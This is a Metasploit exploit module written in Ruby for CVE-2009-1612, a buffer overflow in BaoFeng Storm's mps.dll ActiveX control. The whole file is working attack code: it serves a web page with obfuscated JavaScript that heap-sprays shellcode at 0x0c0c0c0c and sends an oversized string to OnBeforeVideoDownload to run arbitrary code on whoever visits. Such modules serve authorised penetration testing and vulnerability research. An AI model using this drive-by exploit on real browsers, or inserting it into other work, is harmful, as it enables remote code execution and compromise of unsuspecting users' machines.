##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX
        control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing
        an overly long string to the method "OnBeforeVideoDownload" an attacker can execute
        arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-1612' ],
          [ 'OSVDB', '54169' ],
          [ 'BID', '34789' ],
          [ 'EDB', '8579' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # untested, please contribute the vulnerable software if possible.
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
        ],
      'DisclosureDate' => 'Apr 30 2009',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
        ])
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload.
    return if ((p = regenerate_payload(cli)) == nil)

    # ActiveX parameters
    clsid = "6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB"
    progid = "MPS.StormPlayer.1"

    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Prepare the heap spray parameters
    spray_addr = 0x0c0c0c0c
    spray_num = "0x%x" % spray_addr
    spray_str = Rex::Text.to_hex([spray_addr].pack('V'), '%')

    # Generate the final javascript
    js = %Q|
try {
var vulnerable = new ActiveXObject('#{progid}');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);
var evil_string = '';
while (evil_string.length < 4150)
evil_string += my_unescape('#{spray_str}');
vulnerable.OnBeforeVideoDownload(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|

    # Obfuscate the javascript
    opts = {
      'Strings' => true,
      'Symbols' => {
        'Variables' => %w{ vulnerable shellcode my_unescape index evil_string }
      }
    }
    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
    js.update_opts(js_heap_spray.opts)
    js.obfuscate()

    # Generate the final HTML
    content = %Q|<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end
